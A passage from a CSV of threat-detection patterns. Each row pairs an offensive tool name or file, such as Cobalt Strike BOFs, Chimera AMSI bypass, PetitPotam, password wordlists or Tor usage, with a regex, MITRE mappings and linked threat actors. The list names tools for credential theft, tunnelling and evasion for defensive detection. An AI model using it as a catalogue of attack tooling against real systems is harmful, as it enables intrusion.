BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61452" "*token-vault.x86.o*",".{0,1000}token\-vault\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61453" "*TokenViewer.exe*",".{0,1000}TokenViewer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61454" "*tokyoneon/Chimera*",".{0,1000}tokyoneon\/Chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","61455" "*tomcarver16/ADSearch*",".{0,1000}tomcarver16\/ADSearch.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","61456" "*tomcat_mgr_default_userpass.txt*",".{0,1000}tomcat_mgr_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61457" "*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","1","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","61458" "*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","61459" "*tomcatWarDeployer -v -x -p * -H * ",".{0,1000}tomcatWarDeployer\s\-v\s\-x\s\-p\s.{0,1000}\s\-H\s.{0,1000}\s","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61460" 
"*Tool-PassView*",".{0,1000}Tool\-PassView.{0,1000}","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61464" "*tools/ligolo*",".{0,1000}tools\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","61466" "*top100_sublist.txt*",".{0,1000}top100_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","61467" "*top1000_sublist.txt*",".{0,1000}top1000_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","61468" "*Top109Million-probable-v2.txt*",".{0,1000}Top109Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61469" "*Top12Thousand-probable-v2.txt*",".{0,1000}Top12Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61470" "*Top1575-probable-v2.txt*",".{0,1000}Top1575\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61471" "*Top1pt6Million-probable-v2.txt*",".{0,1000}Top1pt6Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61472" "*Top207-probable-v2.txt*",".{0,1000}Top207\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61473" "*Top29Million-probable-v2.txt*",".{0,1000}Top29Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61474" 
"*Top2Billion-probable-v2.txt*",".{0,1000}Top2Billion\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61475" "*Top304Thousand-probable-v2.txt*",".{0,1000}Top304Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61476" "*Top353Million-probable-v2.txt*",".{0,1000}Top353Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","9","10","8895","1608","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z","61477" "*topotam.exe*",".{0,1000}topotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","61478" "*topotam/PetitPotam*",".{0,1000}topotam\/PetitPotam.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","61479" 
"*top-usernames-shortlist.txt*",".{0,1000}top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","61480" "*tor --DataDirectory *",".{0,1000}tor\s\-\-DataDirectory\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61481" "*tor -f .configs/*-torrc*",".{0,1000}tor\s\-f\s\.configs\/.{0,1000}\-torrc.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","61482" "*tor@default.service*",".{0,1000}tor\@default\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux #servicename","N/A","10","10","N/A","N/A","N/A","N/A","61483" "*tor_hiddenservices.rb*",".{0,1000}tor_hiddenservices\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61484" "*tor_services.py*",".{0,1000}tor_services\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","61485" "*tor2socks*",".{0,1000}tor2socks.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux #content","N/A","10","10","N/A","N/A","N/A","N/A","61486" "*tor2web start*",".{0,1000}tor2web\sstart.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61487" "*tor2web stop*",".{0,1000}tor2web\sstop.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61488" "*tor2web.pid*",".{0,1000}tor2web\.pid.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61489" "*tor2web.service*",".{0,1000}tor2web\.service.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61490" "*tor2web/Tor2web*",".{0,1000}tor2web\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software 
that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61491" "*tor2web_notification_form*",".{0,1000}tor2web_notification_form.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61492" "*tor2web-cert.pem*",".{0,1000}tor2web\-cert\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61493" "*tor2web-default.conf*",".{0,1000}tor2web\-default\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61494" "*tor2web-dh.pem*",".{0,1000}tor2web\-dh\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61495" 
"*tor2web-globaleaks.conf*",".{0,1000}tor2web\-globaleaks\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61496" "*tor2web-hidden*",".{0,1000}tor2web\-hidden.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61497" "*tor2web-intermediate.pem*",".{0,1000}tor2web\-intermediate\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61498" "*tor2web-key.pem*",".{0,1000}tor2web\-key\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61499" "*tor2web-visible*",".{0,1000}tor2web\-visible.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","61500" "*TORAnonymizer.ps1*",".{0,1000}TORAnonymizer\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","61501" "*TorBrowser-*macos_ALL.dmg*",".{0,1000}TorBrowser\-.{0,1000}macos_ALL\.dmg.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","#macos","N/A","9","10","N/A","N/A","N/A","N/A","61502" "*torbrowser-install-*_ALL.exe",".{0,1000}torbrowser\-install\-.{0,1000}_ALL\.exe","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61503" "*torbrowser-install-win*.exe*",".{0,1000}torbrowser\-install\-win.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61504" "*torbrowser-install-win64*",".{0,1000}torbrowser\-install\-win64.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61505" "*tor-browser-linux*_ALL.tar.xz*",".{0,1000}tor\-browser\-linux.{0,1000}_ALL\.tar\.xz.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","#linux","N/A","9","10","N/A","N/A","N/A","N/A","61506" "*torEd25519*",".{0,1000}torEd25519.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","61507" "*tor-geoipdb:all*",".{0,1000}tor\-geoipdb\:all.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","61508" "*tor-geoipdb:amd64*",".{0,1000}tor\-geoipdb\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","61509" "*torify curl *",".{0,1000}torify\scurl\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61510" "*torify ghaur *",".{0,1000}torify\sghaur\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61511" "*torify nuclei *",".{0,1000}torify\snuclei\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61512" "*torify sqlmap *",".{0,1000}torify\ssqlmap\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A","61513" "*torpastezr7464pevuvdjisbvaf4yqi4n7sgz7lkwgqwxznwy5duj4ad.onion*",".{0,1000}torpastezr7464pevuvdjisbvaf4yqi4n7sgz7lkwgqwxznwy5duj4ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61514" "*torproject.org/dist/torbrowser/*.*",".{0,1000}torproject\.org\/dist\/torbrowser\/.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61515" "*torproject.org/download/download/*",".{0,1000}torproject\.org\/download\/download\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - Black Basta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","61516" "*--tor-proxy*--pwndb*",".{0,1000}\-\-tor\-proxy.{0,1000}\-\-pwndb.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
